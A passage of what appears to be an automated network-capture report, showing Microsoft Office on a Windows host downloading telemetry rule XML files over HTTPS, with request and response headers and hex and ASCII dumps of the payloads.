                                                                            2024-10-28 08:36:45 UTC1369INData Raw: cc a5 8c 3d fe cc 53 3b 70 35 c1 e6 d5 cb b5 2a e0 e5 7d 87 cf 4e d6 75 55 04 10 a9 2e 18 85 d3 c0 1a be b6 23 8f f3 52 6f 29 5e 3f bc 6f 19 ef 4d 20 52 dd ae 8a c0 f7 c8 ff 0c 76 e0 43 e8 69 a9 04 97 5b 56 9b 3a ca 0a 94 d8 33 af b5 7b ec 62 a6 42 26 dc eb 22 fb 4d bd 07 b8 cc 82 d2 a9 9f 5f 46 b0 a9 25 69 a1 b9 4e f8 13 9b 94 30 2a 17 0f 60 a8 35 ea aa ea 4a c3 1d 16 27 fc 6a 2d 60 14 83 34 47 3e 28 8e e4 16 40 e0 07 72 bb 7d 9f 7f e2 dc 6e bb c3 e2 84 13 46 42 72 83 50 c7 91 76 10 d8 8c 6d b7 e1 3a d9 08 2c db aa b8 c0 2d bb 54 5e 6c 2e 8d aa 91 20 26 e7 18 80 09 47 4a 83 51 4c c0 e0 06 36 dd 8f 22 63 23 a5 04 30 7a e4 c7 95 dc 20 84 50 dc 6a 99 25 fe f0 f0 63 98 a0 18 93 0c 44 9e 14 85 84 82 08 ca 45 13 ec 91 9a 72 d0 67 ca e7 18 dc ef 09 97 7c cb 12
                                                                            Data Ascii: =S;p5*}NuU.#Ro)^?oM RvCi[V:3{bB&"M_F%iN0*`5J'j-`4G>(@r}nFBrPvm:,-T^l. &GJQL6"c#0z Pj%cDErg|
                                                                            2024-10-28 08:36:45 UTC1369INData Raw: d7 17 9a 8d 46 58 2f 71 d3 ae 54 02 e8 76 fb 44 6f 9e 37 d2 9b 44 df 57 4e 61 0a 53 74 0c 21 5f a5 83 4f 18 2c 1f 59 14 7a a0 b9 0e 75 a1 07 3a 57 6a 50 9d c5 df 51 ba d0 d5 20 a6 e4 0b 40 85 5a e9 81 4e 75 f8 3f 27 4f 9e a4 f4 0c a3 bb 94 9e fc d6 65 98 9d 61 60 9c bc ec 5b df ba ec a4 01 ec 0c c3 97 7d 0b 9e b4 be be 4e e9 01 8c 0f 50 ba 7e fa 25 ff be 7e 93 81 0f 60 76 96 c1 c6 fa 4b 5e b2 be 01 ec 2c c3 07 b0 71 d3 fa bf bf e4 34 42 88 20 34 f7 03 d6 55 50 0d e5 08 f5 04 b4 89 f1 95 5b 69 92 f6 3c cf eb 68 8f 70 41 1b 0f ea f5 0e 8e cc 7e a0 0b 58 71 64 e0 4a 29 83 50 ba 86 e1 cc 7e 0c d3 8b 06 83 01 94 97 1b 51 28 1c 47 84 51 bd ec 4a 71 e0 f3 86 94 41 24 5d d7 0d 85 e3 18 ff 3c 1b c1 74 3e c6 7d d5 86 2b 23 b5 b0 10 29 29 19 13 97 89 2b 7d c5 af b8
                                                                            Data Ascii: FX/qTvDo7DWNaSt!_O,Yzu:WjPQ @ZNu?'Oea`[}NP~%~`vK^,q4B 4UP[i<hpA~XqdJ)P~Q(GQJqA$]<t>}+#))+}
                                                                            2024-10-28 08:36:45 UTC1369INData Raw: a7 7d 00 7e 1c fb 87 8c c3 86 e9 38 66 70 c7 1d 77 dc f1 ca ed 67 08 31 09 d9 1d 47 dc 15 ee c2 13 78 12 df 8d 67 f0 0b f8 3d 6a d2 88 a6 84 8c 8a a4 c8 e7 92 6e b9 50 33 35 0b 9a ab b2 42 a5 2a 5f 0f e5 db 01 79 db ec f6 c2 66 92 35 93 2a 2d 8a 0a ea 48 25 b2 cb 03 17 a5 4a b3 f5 b9 91 54 a1 12 f2 e7 27 6a 12 25 49 a2 86 7f e4 27 9b 64 52 a5 ef 9d 50 4e a2 8b 98 b2 44 85 52 0e 53 77 12 15 47 81 7e 31 51 61 f4 ec cb e4 f2 43 3e 86 d5 db 81 ea b6 b0 3d 89 92 c7 ce 34 99 96 60 30 46 a5 a6 c9 44 25 2a 2e a7 55 a5 16 65 a2 a4 76 63 5a 3e cd 9d 57 6a 56 2e aa 46 a1 de 0e 14 b7 4d 17 66 65 f5 a8 f3 4b 3d e3 a2 60 72 6b e6 b3 42 e6 d2 41 66 31 0d c9 8b 52 4d e7 73 35 93 3e 34 50 04 c7 c2 f5 99 96 4a 48 f7 4b f7 a2 52 2a 4e b2 d1 d5 a5 8a 93 a2 92 a8 3a ed 9c 42
                                                                            Data Ascii: }~8fpwg1Gxg=jnP35B*_yf5*-H%JT'j%I'dRPNDRSwG~1QaC>=4`0FD%*.UevcZ>WjV.FMfeK=`rkBAf1RMs5>4PJHKR*N:B
                                                                            2024-10-28 08:36:45 UTC1369INData Raw: ff ad 7f 79 d1 8b 5e f4 c2 a7 b6 bf b5 7d d3 f7 be f7 bd 7f f9 e5 77 bf fb dd 6f 43 8a 0f 5d 5a cc bf 0a ff 05 df 42 4f 40 a8 97 0c b4 de f2 5e f1 62 82 8e 6e c6 04 ae b0 c6 dc 12 78 11 a9 13 f0 01 83 ad 41 32 15 0d c4 25 d8 58 5f 14 c0 9f 76 3c cf 71 9a ad d5 0b cf 3b 6f 41 62 22 29 75 aa aa d5 c5 38 ea b6 30 76 a4 a4 18 db 96 69 db e5 b2 5b 62 98 38 9e e7 3a 04 07 65 e1 18 06 00 70 a3 cc ad 52 c5 0f 03 21 4b 1c 53 29 84 00 db 76 38 7d e2 62 ab d5 5b 5d 5d ed 74 dd 60 b1 79 fe 52 d2 6a 38 4e d2 6c f9 91 65 01 f6 00 18 37 0d 4a c3 7a 3d f4 6c ab e2 59 84 f9 81 ef 87 f5 4e ad cc 0d af ec 12 e6 56 2a 96 59 e2 b6 5f 2e 03 8b 54 c5 24 84 73 8c 85 6d 5b 26 a5 08 21 86 d0 9c b7 32 b4 84 5a 68 1b 9d 44 bb 08 f5 44 58 40 ba d8 2a 9d f6 ce 8b 4e a7 03 d0 c0 81 68
                                                                            Data Ascii: y^}woC]ZBO@^bnxA2%X_v<q;oAb")u80vi[b8:epR!KS)v8}b[]]t`yRj8Nle7Jz=lYNV*Y_.T$sm[&!2ZhDDX@*Nh


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            32192.168.2.44979213.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:00 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:00 UTC561INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:00 GMT
                                                                            Content-Type: text/plain
                                                                            Content-Length: 218853
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public
                                                                            Last-Modified: Sun, 27 Oct 2024 10:35:44 GMT
                                                                            ETag: "0x8DCF6731CF80310"
                                                                            x-ms-request-id: 23ac3994-301e-0051-6594-2838bb000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083700Z-r197bdfb6b46kmj4701qkq602400000003t00000000062cg
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            X-Cache-Info: L1_T2
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:00 UTC15823INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                            Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                            2024-10-28 08:37:00 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                            Data Ascii: <S T="1" F="0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L>
                                                                            2024-10-28 08:37:00 UTC16384INData Raw: 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d
                                                                            Data Ascii: <S T="3" /> </T> <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-
                                                                            2024-10-28 08:37:00 UTC16384INData Raw: 6e 74 73 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a
                                                                            Data Ascii: nts" /> </C> <C T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" />
                                                                            2024-10-28 08:37:00 UTC16384INData Raw: 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20
                                                                            Data Ascii: </S> <C T="U32" I="0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32"
                                                                            2024-10-28 08:37:00 UTC16384INData Raw: 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20
                                                                            Data Ascii: _Count"> <C> <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S
                                                                            2024-10-28 08:37:01 UTC16384INData Raw: 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22
                                                                            Data Ascii: <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3"
                                                                            2024-10-28 08:37:01 UTC16384INData Raw: 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65
                                                                            Data Ascii: </L> <R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false
                                                                            2024-10-28 08:37:01 UTC16384INData Raw: 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                            Data Ascii: T="B" /> </R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" />
                                                                            2024-10-28 08:37:01 UTC16384INData Raw: 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54
                                                                            Data Ascii: O> </F> <F T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            33192.168.2.44979413.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:02 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:02 UTC563INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:02 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 3788
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                            ETag: "0x8DC582BAC2126A6"
                                                                            x-ms-request-id: 041e76a7-601e-005c-45ae-26f06f000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083702Z-16849878b78tg5n42kspfr0x4800000004s0000000009rgh
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:02 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            34192.168.2.44979813.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:02 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:02 UTC563INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:02 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 2160
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                            ETag: "0x8DC582BA3B95D81"
                                                                            x-ms-request-id: f31c25f5-601e-0001-6558-27faeb000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083702Z-17c5cb586f69w69mgazyf263an00000003w00000000064ns
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:02 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            35192.168.2.44979613.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:02 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:02 UTC563INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:02 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 2980
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                            ETag: "0x8DC582BA80D96A1"
                                                                            x-ms-request-id: 23ba7a24-801e-0015-5af3-24f97f000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083702Z-17c5cb586f6sqz6fff89etrx0800000004a000000000952z
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
